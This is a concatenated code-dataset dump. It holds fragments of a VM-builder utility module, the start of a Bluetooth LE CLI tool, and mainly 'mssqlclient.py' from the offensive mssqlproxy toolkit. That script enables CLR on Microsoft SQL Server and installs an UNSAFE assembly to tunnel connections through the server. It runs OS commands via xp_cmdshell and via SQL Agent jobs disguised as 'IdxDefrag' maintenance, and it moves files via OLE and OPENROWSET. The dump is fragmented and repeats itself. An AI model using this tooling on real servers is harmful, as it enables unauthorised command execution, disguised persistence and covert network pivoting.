mystderr = NonBlockingFile(proc.stderr, logfunc=(ignore_fail and logging.debug or logging.info))
while not (mystdout.closed and mystderr.closed):
# Block until either of them has something to offer
fds = select.select([x.file for x in [mystdout, mystderr] if not x.closed], [], [])[0]
for fp in [mystderr, mystdout]:
if fp.file in fds:
fp.process_input()
status = proc.wait()
if not ignore_fail and status != 0:
raise VMBuilderException, "Process (%s) returned %d. stdout: %s, stderr: %s" % (args.__repr__(), status, mystdout.buf, mystderr.buf)
return mystdout.buf
def checkroot():
"""
Check if we're running as root, and bail out if we're not.
"""
if os.geteuid() != 0:
raise VMBuilderUserError("This script must be run as root (e.g. via sudo)")
def set_up_tmpfs(tmp_root=None, size=1024):
"""Sets up a tmpfs storage under `tmp_root` with the size of `size` MB.
`tmp_root` defaults to tempfile.gettempdir().
"""
mount_point = tmpdir('tmpfs', tmp_root)
mount_cmd = ["mount", "-t", "tmpfs",
"-o", "size=%dM,mode=0770" % int(size),
"tmpfs", mount_point ]
logging.info('Mounting tmpfs under %s' % mount_point)
logging.debug('Executing: %s' % mount_cmd)
run_cmd(*mount_cmd)
return mount_point
def clean_up_tmpfs(mount_point):
"""Unmounts a tmpfs storage under `mount_point`."""
umount_cmd = ["umount", "-t", "tmpfs", mount_point ]
logging.info('Unmounting tmpfs from %s' % mount_point)
logging.debug('Executing: %s' % umount_cmd)
run_cmd(*umount_cmd)
| 35.052402 | 140 | 0.639342 | #
# Uncomplicated VM Builder
# Copyright (C) 2007-2009 Canonical Ltd.
#
# See AUTHORS for list of contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Various utility functions
import ConfigParser
import errno
import fcntl
import logging
import os.path
import select
import subprocess
import tempfile
from exception import VMBuilderException, VMBuilderUserError
class NonBlockingFile(object):
def __init__(self, fp, logfunc):
self.file = fp
self.set_non_blocking()
self.buf = ''
self.logbuf = ''
self.logfunc = logfunc
def set_non_blocking(self):
flags = fcntl.fcntl(self.file, fcntl.F_GETFL)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(self.file, fcntl.F_SETFL, flags)
def __getattr__(self, attr):
if attr == 'closed':
return self.file.closed
else:
raise AttributeError()
def process_input(self):
data = self.file.read()
if data == '':
self.file.close()
if self.logbuf:
self.logfunc(self.logbuf)
else:
self.buf += data
self.logbuf += data
while '\n' in self.logbuf:
line, self.logbuf = self.logbuf.split('\n', 1)
self.logfunc(line)
def run_cmd(*argv, **kwargs):
"""
Runs a command.
Locale is reset to C to make parsing error messages possible.
@type stdin: string
@param stdin: input to provide to the process on stdin. If None, process'
stdin will be attached to /dev/null
@type ignore_fail: boolean
@param ignore_fail: If True, a non-zero exit code from the command will not
cause an exception to be raised.
@type env: dict
@param env: Dictionary of extra environment variables to set in the new process
@rtype: string
@return: string containing the stdout of the process
"""
env = kwargs.get('env', {})
stdin = kwargs.get('stdin', None)
ignore_fail = kwargs.get('ignore_fail', False)
args = [str(arg) for arg in argv]
logging.debug(args.__repr__())
if stdin:
logging.debug('stdin was set and it was a string: %s' % (stdin,))
stdin_arg = subprocess.PIPE
else:
stdin_arg = file('/dev/null', 'r')
proc_env = dict(os.environ)
proc_env['LANG'] = 'C'
proc_env['LC_ALL'] = 'C'
proc_env.update(env)
try:
proc = subprocess.Popen(args, stdin=stdin_arg, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=proc_env)
except OSError, error:
if error.errno == errno.ENOENT:
raise VMBuilderUserError, "Couldn't find the program '%s' on your system" % (argv[0])
else:
raise VMBuilderUserError, "Couldn't launch the program '%s': %s" % (argv[0], error)
if stdin:
proc.stdin.write(stdin)
proc.stdin.close()
mystdout = NonBlockingFile(proc.stdout, logfunc=logging.debug)
mystderr = NonBlockingFile(proc.stderr, logfunc=(ignore_fail and logging.debug or logging.info))
while not (mystdout.closed and mystderr.closed):
# Block until either of them has something to offer
fds = select.select([x.file for x in [mystdout, mystderr] if not x.closed], [], [])[0]
for fp in [mystderr, mystdout]:
if fp.file in fds:
fp.process_input()
status = proc.wait()
if not ignore_fail and status != 0:
raise VMBuilderException, "Process (%s) returned %d. stdout: %s, stderr: %s" % (args.__repr__(), status, mystdout.buf, mystderr.buf)
return mystdout.buf
def checkroot():
"""
Check if we're running as root, and bail out if we're not.
"""
if os.geteuid() != 0:
raise VMBuilderUserError("This script must be run as root (e.g. via sudo)")
def render_template(plugin, context, tmplname, extra_context=None):
# Import here to avoid having to build-dep on python-cheetah
from Cheetah.Template import Template
searchList = []
if context:
searchList.append(extra_context)
searchList.append(context)
# tmpldirs.insert(0,'%s/%%s' % vm.templates)
tmpldirs = [dir % plugin for dir in context.template_dirs]
for dir in tmpldirs:
tmplfile = '%s/%s.tmpl' % (dir, tmplname)
if os.path.exists(tmplfile):
t = Template(file=tmplfile, searchList=searchList)
output = t.respond()
logging.debug('Output from template \'%s\': %s' % (tmplfile, output))
return output
raise VMBuilderException('Template %s.tmpl not found in any of %s' % (tmplname, ', '.join(tmpldirs)))
def call_hooks(context, func, *args, **kwargs):
logging.info('Calling hook: %s' % func)
logging.debug('(args=%r, kwargs=%r)' % (args, kwargs))
for plugin in context.plugins:
logging.debug('Calling %s method in %s plugin.' % (func, plugin.__module__))
try:
getattr(plugin, func)(*args, **kwargs)
except AttributeError as e:
logging.debug('No such method ({}) in context plugin ({})'.format(
func, plugin.__module__))
for f in context.hooks.get(func, []):
logging.debug('Calling %r.' % (f,))
f(*args, **kwargs)
logging.debug('Calling %s method in context plugin %s.' % (func, context.__module__))
try:
getattr(context, func)(*args, **kwargs)
except AttributeError as e:
logging.debug('No such method ({}) in context plugin ({})'.format(
func, plugin.__module__))
def tmp_filename(suffix='', tmp_root=None):
# There is a risk in using tempfile.mktemp(): it's not recommended
# to run vmbuilder on machines with untrusted users.
return tempfile.mktemp(suffix=suffix, dir=tmp_root)
def tmpdir(suffix='', tmp_root=None):
return tempfile.mkdtemp(suffix=suffix, dir=tmp_root)
def set_up_tmpfs(tmp_root=None, size=1024):
"""Sets up a tmpfs storage under `tmp_root` with the size of `size` MB.
`tmp_root` defaults to tempfile.gettempdir().
"""
mount_point = tmpdir('tmpfs', tmp_root)
mount_cmd = ["mount", "-t", "tmpfs",
"-o", "size=%dM,mode=0770" % int(size),
"tmpfs", mount_point ]
logging.info('Mounting tmpfs under %s' % mount_point)
logging.debug('Executing: %s' % mount_cmd)
run_cmd(*mount_cmd)
return mount_point
def clean_up_tmpfs(mount_point):
"""Unmounts a tmpfs storage under `mount_point`."""
umount_cmd = ["umount", "-t", "tmpfs", mount_point ]
logging.info('Unmounting tmpfs from %s' % mount_point)
logging.debug('Executing: %s' % umount_cmd)
run_cmd(*umount_cmd)
def get_conf_value(context, confparser, key):
confvalue = None
try:
confvalue = confparser.get('DEFAULT', key)
except ConfigParser.NoSectionError:
pass
except ConfigParser.NoOptionError:
pass
if confparser.has_option(context.arg, key):
confvalue = confparser.get(context.arg, key)
logging.debug('Returning value %s for configuration key %s' % (repr(confvalue), key))
return confvalue
def apply_config_files_to_context(config_files, context):
confparser = ConfigParser.SafeConfigParser()
confparser.read(config_files)
for (key, setting) in context._config.iteritems():
confvalue = get_conf_value(context, confparser, key)
if confvalue:
setting.set_value_fuzzy(confvalue)
| 3,479 | 9 | 268 |
a8f1d9e916607551577ad10de7f094657e42fb01 | 20,490 | py | Python | mssqlclient.py | iptL-F4ck/mssqlproxy | c64bfe4ba05ad1f8e8a608692da94819f6652693 | [
"MIT"
] | null | null | null | mssqlclient.py | iptL-F4ck/mssqlproxy | c64bfe4ba05ad1f8e8a608692da94819f6652693 | [
"MIT"
] | null | null | null | mssqlclient.py | iptL-F4ck/mssqlproxy | c64bfe4ba05ad1f8e8a608692da94819f6652693 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (c) 2020 BlackArrow
#
#
# This product includes software developed by
# SecureAuth Corporation (https://www.secureauth.com/).
#
# Description: [MS-TDS] & [MC-SQLR] example.
#
# Original author:
# Alberto Solino (beto@coresecurity.com/@agsolino)
#
# Author:
# Pablo Martinez (https://twitter.com/xassiz)
#
from __future__ import division
from __future__ import print_function
import argparse
import sys
import os
import logging
import socket
import threading
import select
from impacket.examples import logger
from impacket import version, tds
# Proxy config
MSG_END_OF_TRANSIMISSION = b"\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
MSG_EXIT_CMD = b"\x12\x34\x56"
MSG_EXIT_ACK = b"\x65\x43\x21"
ASSEMBLY_NAME = "Microsoft.SqlServer.Proxy"
PROCEDURE_NAME = "sp_start_proxy"
if __name__ == '__main__':
import cmd
# Init the example's logger theme
logger.init()
print(version.BANNER)
print("mssqlproxy - Copyright 2020 BlackArrow")
parser = argparse.ArgumentParser(add_help = True, description = "TDS client implementation (SSL supported).")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')
parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')
parser.add_argument('-windows-auth', action='store_true', default = 'False', help='whether or not to use Windows '
'Authentication (default False)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
# Proxy mode arguments
group = parser.add_argument_group('proxy mode')
group.add_argument('-reciclador', action="store", metavar = "path", help='Remote path where DLL is stored in server')
group.add_argument('-install', action="store_true", help='Installs CLR assembly')
group.add_argument('-uninstall', action="store_true", help='Uninstalls CLR assembly')
group.add_argument('-check', action="store_true", help='Checks if CLR is ready')
group.add_argument('-start', action="store_true", help='Starts proxy')
group.add_argument('-local-port', action="store", metavar = "port", type=int, default=1337, help='Local port to listen on')
group.add_argument('-clr', action="store", metavar="local_path", help='Local CLR path')
group.add_argument('-no-check-src-port', action="store_true", help='Use this option when connection is not direct (e.g. proxy)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
# If proxy params
if any(getattr(options, l) for l in ['reciclador', 'install', 'uninstall', 'check', 'start', 'clr']):
proxy_mode = True
if sum((options.install, options.uninstall, options.check, options.start)) != 1:
logging.error("please, choose one of the following actions: install, uninstall, check, start")
sys.exit(1)
if (options.start or options.check) and not options.reciclador:
logging.error("reciclador path is mandatory")
sys.exit(1)
if options.install and not options.clr:
logging.error("CLR path is mandatory")
sys.exit(1)
else:
proxy_mode = False
ms_sql = tds.MSSQL(address, int(options.port))
ms_sql.connect()
try:
if options.k is True:
res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
kdcHost=options.dc_ip)
else:
res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)
ms_sql.printReplies()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
res = False
if res is True:
# If proxy mode
if proxy_mode:
proxy_opt = {
'install' : proxy_install,
'uninstall': proxy_uninstall,
'check' : proxy_check,
'start' : proxy_start
}
opt = next(mode for mode in proxy_opt.keys() if getattr(options, mode))
proxy_opt[opt](ms_sql, options)
# Shell mode
else:
shell = SQLSHELL(ms_sql)
if options.file is None:
shell.cmdloop()
else:
for line in options.file.readlines():
print("SQL> %s" % line, end=' ')
shell.onecmd(line)
ms_sql.disconnect()
| 37.052441 | 158 | 0.551147 | #!/usr/bin/env python
#
# Copyright (c) 2020 BlackArrow
#
#
# This product includes software developed by
# SecureAuth Corporation (https://www.secureauth.com/).
#
# Description: [MS-TDS] & [MC-SQLR] example.
#
# Original author:
# Alberto Solino (beto@coresecurity.com/@agsolino)
#
# Author:
# Pablo Martinez (https://twitter.com/xassiz)
#
from __future__ import division
from __future__ import print_function
import argparse
import sys
import os
import logging
import socket
import threading
import select
from impacket.examples import logger
from impacket import version, tds
# Proxy config
MSG_END_OF_TRANSIMISSION = b"\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
MSG_EXIT_CMD = b"\x12\x34\x56"
MSG_EXIT_ACK = b"\x65\x43\x21"
ASSEMBLY_NAME = "Microsoft.SqlServer.Proxy"
PROCEDURE_NAME = "sp_start_proxy"
def set_configuration(mssql, option, value):
mssql.batch("exec master.dbo.sp_configure '%s',%d; RECONFIGURE;" % (option, value))
return check_configuration(mssql, option, value)
def check_configuration(mssql, option, value):
try:
res = mssql.batch("SELECT cast(value as INT) as v FROM sys.configurations where name = '%s'" % option)[0]['v']
return res == value
except:
return False
def file_exists(mssql, path):
try:
res = mssql.batch("DECLARE @r INT; EXEC master.dbo.xp_fileexist '%s', @r OUTPUT; SELECT @r as n" % path)[0]['n']
return res == 1
except:
return False
def proxy_install(mssql, args):
logging.info("Proxy mode: install")
if set_configuration(mssql, 'show advanced options', 1) == False:
logging.error("Cannot enable 'show advanced options'")
return
if set_configuration(mssql, 'clr enabled', 1) == False:
logging.error("Cannot enable CLR")
return
else:
logging.info("CLR enabled")
with open(args.clr, 'rb') as f:
data = f.read().hex()
mssql.batch("USE msdb; CREATE ASSEMBLY [%s] FROM 0x%s WITH PERMISSION_SET = UNSAFE" % (ASSEMBLY_NAME, data))
res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
if res == 1:
logging.info("Assembly successfully installed")
mssql.batch("CREATE PROCEDURE [dbo].[%s]"
" @path NVARCHAR (4000), @client_addr NVARCHAR (4000), @client_port INTEGER"
" AS EXTERNAL NAME [%s].[StoredProcedures].[sp_start_proxy]" % (PROCEDURE_NAME, ASSEMBLY_NAME))
res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
if res == 1:
logging.info("Procedure successfully installed")
else:
logging.error("Cannot install procedure")
else:
logging.error("Cannot install assembly")
def proxy_uninstall(mssql, args):
logging.info("Proxy mode: uninstall")
res = mssql.batch("USE msdb; DROP PROCEDURE [%s]; SELECT COUNT(*) AS n FROM sys.procedures where name = '%s' " % (PROCEDURE_NAME, PROCEDURE_NAME))[0]['n']
if res == 0:
logging.info("Procedure successfully uninstalled")
else:
logging.error("Cannot uninstall procedure")
res = mssql.batch("DROP ASSEMBLY [%s]; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s' " % (ASSEMBLY_NAME, ASSEMBLY_NAME))[0]['n']
if res == 0:
logging.info("Assembly successfully uninstalled")
else:
logging.error("Cannot uninstall assembly")
if set_configuration(mssql, 'show advanced options', 1) == False:
logging.error("Cannot enable 'show advanced options'")
else:
if set_configuration(mssql, 'clr enabled', 0) == False:
logging.error("Cannot disable CLR")
else:
logging.info("CLR disabled")
def proxy_check(mssql, args):
success = True
logging.info("Proxy mode: check")
res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
if res == 1:
logging.info("Assembly is installed")
else:
success = False
logging.error("Assembly not found")
res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
if res == 1:
logging.info("Procedure is installed")
else:
success = False
logging.error("Procedure not found")
if file_exists(mssql, args.reciclador):
logging.info("reciclador is installed")
else:
success = False
logging.error("reciclador not found")
if check_configuration(mssql, 'clr enabled', 1):
logging.info("clr enabled")
else:
success = False
logging.error("clr disabled")
return success
def proxy_worker(server, client):
logging.info("New connection")
client.setblocking(0)
while True:
readable, writable, errfds = select.select([client, server], [], [], 60)
for sock in readable:
if sock is client:
data = client.recv(2048)
if len(data) == 0:
logging.info("Client disconnected!")
logging.debug("Sending end-of-tranmission")
server.sendall(MSG_END_OF_TRANSIMISSION)
return
logging.debug("Client: %s" % data.hex())
server.sendall(data)
elif sock is server:
data = server.recv(2048)
if len(data) == 0:
logging.info("Server disconnected!")
return
logging.debug("Server: %s" % data.hex())
client.sendall(data)
def proxy_start(mssql, args):
if not proxy_check(mssql, args):
return
logging.info("Proxy mode: start")
laddr, lport = mssql.socket.getsockname()
if args.no_check_src_port:
lport = 0
logging.info("Connection is not direct")
else:
logging.debug("Local addr = %s:%d" % (laddr, lport))
local_port = getattr(args, 'local_port')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("0.0.0.0", local_port))
except Exception as err:
logging.error("Error: '%s'" % err)
return
logging.info("Listening on port %d..." % local_port)
try:
mssql.batch("DECLARE @ip varchar(15); SET @ip=TRIM(CONVERT(char(15), CONNECTIONPROPERTY('client_net_address')));"
"EXEC msdb.dbo.%s '%s', @ip, %d" % (PROCEDURE_NAME, args.reciclador, lport), tuplemode=False, wait=False)
data = mssql.socket.recv(2048)
if b'Powered by blackarrow.net' in data:
logging.info("ACK from server!")
mssql.socket.sendall(b"ACK")
else:
logging.error("cannot establish connection")
raise Exception('cannot establish connection')
s.listen(10)
while True:
client, _ = s.accept()
t = threading.Thread(target=proxy_worker, args=(mssql.socket, client))
t.start()
except:
mssql.socket.sendall(MSG_EXIT_CMD)
ack = mssql.socket.recv(1024)
if MSG_EXIT_ACK in ack:
logging.info("Bye!")
else:
logging.error("Server did not ack :(")
return
if __name__ == '__main__':
import cmd
class SQLSHELL(cmd.Cmd):
def __init__(self, SQL):
cmd.Cmd.__init__(self)
self.sql = SQL
self.prompt = 'SQL> '
self.intro = '[!] Press help for extra shell commands'
def do_help(self, line):
print("""
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
download {remote} {local} - download a remote file to a local path
upload {local} {remote} - upload a local file to a remote path (OLE required)
enable_ole - you know what it means
disable_ole - you know what it means
""")
def do_download(self, params):
try:
remote, local = params.split(' ')
except:
logging.error("download: invalid params")
return
print("[+] Downloading '%s' to '%s'..." % (remote, local))
try:
self.sql.sql_query("SELECT * FROM OPENROWSET(BULK N'%s', SINGLE_BLOB) rs" % remote)
data = self.sql.rows[0]['BulkColumn']
with open(local, 'wb') as f:
f.write(bytes.fromhex(data.decode()))
print("[+] Download completed")
except Exception as e:
print(str(e))
def do_upload(self, params):
try:
local, remote = params.split(' ')
except:
logging.error("upload: invalid params")
return
if check_configuration(self.sql, 'Ole Automation Procedures', 0):
if self.do_enable_ole(None) == False:
return
print("[+] Uploading '%s' to '%s'..." % (local, remote))
try:
with open(local, 'rb') as f:
data = f.read()
print("[+] Size is %d bytes" % len(data))
hexdata = "0x%s" % data.hex()
self.sql.sql_query("DECLARE @ob INT;"
"EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;"
"EXEC sp_OASetProperty @ob, 'Type', 1;"
"EXEC sp_OAMethod @ob, 'Open';"
"EXEC sp_OAMethod @ob, 'Write', NULL, %s;"
"EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '%s', 2;"
"EXEC sp_OAMethod @ob, 'Close';"
"EXEC sp_OADestroy @ob;" % (hexdata, remote))
if file_exists(self.sql, remote):
print("[+] Upload completed")
else:
print("[-] Error uploading - writable?")
except Exception as e:
print("[-] Error - " + str(e))
def do_enable_ole(self, line):
try:
if set_configuration(self.sql, 'show advanced options', 1) == False:
logging.error("cannot enable 'show advanced options'")
return False
if set_configuration(self.sql, 'Ole Automation Procedures', 1) == False:
logging.error("cannot enable 'Ole Automation Procedures'")
return False
except:
return True
def do_disable_ole(self, line):
try:
if set_configuration(self.sql, 'show advanced options', 1) == False:
logging.error("cannot enable 'show advanced options'")
return False
if set_configuration(self.sql, 'Ole Automation Procedures', 0) == False:
logging.error("cannot disable 'Ole Automation Procedures'")
return False
except:
return True
def do_shell(self, s):
os.system(s)
def do_xp_cmdshell(self, s):
try:
self.sql.sql_query("exec master..xp_cmdshell '%s'--sp_password" % s.replace("'", "''"))
self.sql.printReplies()
self.sql.colMeta[0]['TypeData'] = 80*2
for row in self.sql.rows:
for col in self.sql.colMeta:
if row[col['Name']] == 'NULL':
print('')
else:
print(row[col['Name']])
# self.sql.printRows()
except:
pass
def sp_start_job(self, s):
try:
self.sql.sql_query("DECLARE @job NVARCHAR(100);"
"SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
"EXEC msdb..sp_add_job @job_name=@job,@description='INDEXDEFRAG',"
"@owner_login_name='sa',@delete_level=3;"
"EXEC msdb..sp_add_jobstep @job_name=@job,@step_id=1,@step_name='Defragmentation',"
"@subsystem='CMDEXEC',@command='%s',@on_success_action=1;"
"EXEC msdb..sp_add_jobserver @job_name=@job;"
"EXEC msdb..sp_start_job @job_name=@job;" % s)
self.sql.printReplies()
self.sql.printRows()
except:
pass
def do_lcd(self, s):
if s == '':
print(os.getcwd())
else:
os.chdir(s)
def do_enable_xp_cmdshell(self, line):
try:
self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
self.sql.printReplies()
self.sql.printRows()
except:
pass
def do_disable_xp_cmdshell(self, line):
try:
self.sql.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
"'show advanced options', 0 ;RECONFIGURE;")
self.sql.printReplies()
self.sql.printRows()
except:
pass
def default(self, line):
try:
self.sql.sql_query(line)
self.sql.printReplies()
self.sql.printRows()
except:
pass
def emptyline(self):
pass
def do_exit(self, line):
return True
# Init the example's logger theme
logger.init()
print(version.BANNER)
print("mssqlproxy - Copyright 2020 BlackArrow")
parser = argparse.ArgumentParser(add_help = True, description = "TDS client implementation (SSL supported).")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')
parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')
parser.add_argument('-windows-auth', action='store_true', default = 'False', help='whether or not to use Windows '
'Authentication (default False)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
# Proxy mode arguments
group = parser.add_argument_group('proxy mode')
group.add_argument('-reciclador', action="store", metavar = "path", help='Remote path where DLL is stored in server')
group.add_argument('-install', action="store_true", help='Installs CLR assembly')
group.add_argument('-uninstall', action="store_true", help='Uninstalls CLR assembly')
group.add_argument('-check', action="store_true", help='Checks if CLR is ready')
group.add_argument('-start', action="store_true", help='Starts proxy')
group.add_argument('-local-port', action="store", metavar = "port", type=int, default=1337, help='Local port to listen on')
group.add_argument('-clr', action="store", metavar="local_path", help='Local CLR path')
group.add_argument('-no-check-src-port', action="store_true", help='Use this option when connection is not direct (e.g. proxy)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
# If proxy params
if any(getattr(options, l) for l in ['reciclador', 'install', 'uninstall', 'check', 'start', 'clr']):
proxy_mode = True
if sum((options.install, options.uninstall, options.check, options.start)) != 1:
logging.error("please, choose one of the following actions: install, uninstall, check, start")
sys.exit(1)
if (options.start or options.check) and not options.reciclador:
logging.error("reciclador path is mandatory")
sys.exit(1)
if options.install and not options.clr:
logging.error("CLR path is mandatory")
sys.exit(1)
else:
proxy_mode = False
ms_sql = tds.MSSQL(address, int(options.port))
ms_sql.connect()
try:
if options.k is True:
res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
kdcHost=options.dc_ip)
else:
res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)
ms_sql.printReplies()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
res = False
if res is True:
# If proxy mode
if proxy_mode:
proxy_opt = {
'install' : proxy_install,
'uninstall': proxy_uninstall,
'check' : proxy_check,
'start' : proxy_start
}
opt = next(mode for mode in proxy_opt.keys() if getattr(options, mode))
proxy_opt[opt](ms_sql, options)
# Shell mode
else:
shell = SQLSHELL(ms_sql)
if options.file is None:
shell.cmdloop()
else:
for line in options.file.readlines():
print("SQL> %s" % line, end=' ')
shell.onecmd(line)
ms_sql.disconnect()
| 13,115 | 3 | 675 |
400ff23eea96eef52d15f5da1e54e1282902b729 | 19,636 | py | Python | blesuite/cli/blesuite_cli.py | jreynders/BLESuite-1 | 1c3c15fc2d4e30c3f9c1a15e0268cae84685784b | [
"MIT"
] | 198 | 2016-08-04T05:45:38.000Z | 2022-02-17T08:30:58.000Z | blesuite/cli/blesuite_cli.py | jreynders/BLESuite-1 | 1c3c15fc2d4e30c3f9c1a15e0268cae84685784b | [
"MIT"
] | 13 | 2018-02-04T14:16:16.000Z | 2020-10-09T02:16:24.000Z | blesuite/cli/blesuite_cli.py | jreynders/BLESuite-1 | 1c3c15fc2d4e30c3f9c1a15e0268cae84685784b | [
"MIT"
] | 57 | 2016-08-08T04:24:04.000Z | 2022-01-24T08:43:02.000Z | import argparse
from blesuite.connection_manager import BLEConnectionManager
from blesuite_wrapper import ble_service_read, ble_service_read_async, ble_service_write, \
ble_handle_subscribe, ble_service_scan, ble_service_write_async, ble_run_smart_scan
from blesuite import utils
from blesuite.utils.print_helper import print_data_and_hex
from blesuite.utils import validators
import logging
__version__ = "2.0"
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def parse_command():
"""
Creates parser and parses command line tool call.
:return: parsed arguments
"""
global __version__
#Dictionary of available commands. Place new commands here
cmd_choices = {'scan': "Scan for BTLE devices",
'smartscan': "Scan specified BTLE device for device information, services, characteristics "
"(including associated descriptors). Note: This scan takes longer than the service scan",
'servicescan': 'Scan specified address for all services, characteristics, and descriptors. ',
'read': "Read value from specified device and handle",
'write': "Write value to specific handle on a device. Specify the --data or --files options"
"to set the payload data. Only data or file data can be specified, not both"
"(data submitted using the data flag takes precedence over data in files).",
'subscribe': "Write specified value (0000,0100,0200,0300) to chosen handle and initiate listener.",
'spoof': 'Modify your Bluetooth adapter\'s BT_ADDR. Use --address to set the address. Some chipsets'
' may not be supported.'}
address_type_choices = ['public', 'random']
parser = argparse.ArgumentParser(prog="blesuite",
description='Bluetooh Low Energy (BTLE) tool set for communicating and '
'testing BTLE devices on the application layer.') # ,
# formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('command', metavar='command', type=str, nargs=1,
action='store', choices=cmd_choices.keys(),
help='BLESuite command you would like to execute.' +
'The following are the currently supported commands:\n' +
'\n'.join(['\033[1m{}\033[0m: {}'.format(k, v) for k, v in cmd_choices.iteritems()]))
parser.add_argument('--async', action='store_true', help='\033[1m<read, write>\033[0m '
'Enable asynchronous writing/reading. Any output'
'will be displayed when received. This prevents'
'blocking.')
parser.add_argument('--skip-device-info-query', action='store_true', help='\033[1m<smartscan>\033[0m '
'When scanning a device, specify this flag'
'to force smartscan to skip querying the device'
'for common information such as device name. This'
'is helpful when devices do not implement these services.')
parser.add_argument('--smart-read', action='store_true', help='\033[1m<smartscan>\033[0m '
'When scanning a device, specify this flag'
'to force smartscan to attempt to read'
'from each discovered characteristic descriptor.'
'Note: This will increase scan time to handle'
'each read operation.')
parser.add_argument('-m', '--mode', metavar='mode', default=[1],
type=int, nargs=1, required=False,
